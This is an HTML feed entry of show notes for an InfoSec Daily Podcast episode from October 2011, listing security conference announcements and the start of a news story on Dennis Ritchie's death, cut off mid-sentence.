		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2964</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 494 for October 13, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Dr. Bonez and Varun Sharma. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 494 for October 13, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Dr. Bonez and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br />
	</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Listen to Rafago to http://podcast.wh1t3rabbit.net/. </span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&quot;right&quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://techcrunch.com/2011/10/13/father-of-c-and-unix-dennis-ritchie-passes-away-at-age-70/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://techcrunch.com/2011/10/13/father-of-c-and-unix-dennis-ritchie-passes-away-at-age-70/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">After a long illness,</span><a href="http://en.wikipedia.org/wiki/Dennis_Ritchie"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Dennis Ritchie</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, father of Unix and an esteemed computer scientist, died last weekend at the age of 70.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ritchie, also known as &ldquo;dmr&rdquo;, is best know for creating the C programming language as well as being instrumental in the development of UNIX along with Ken Thompson. Ritchie spent most of his career at Bell Labs, which at the time of his joining in 1967, was one of the largest phone providers in the U.S. and had one of the most well-known research labs in operation.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Working alongside Thompson (who had written B) at Bell in the late sixties, 
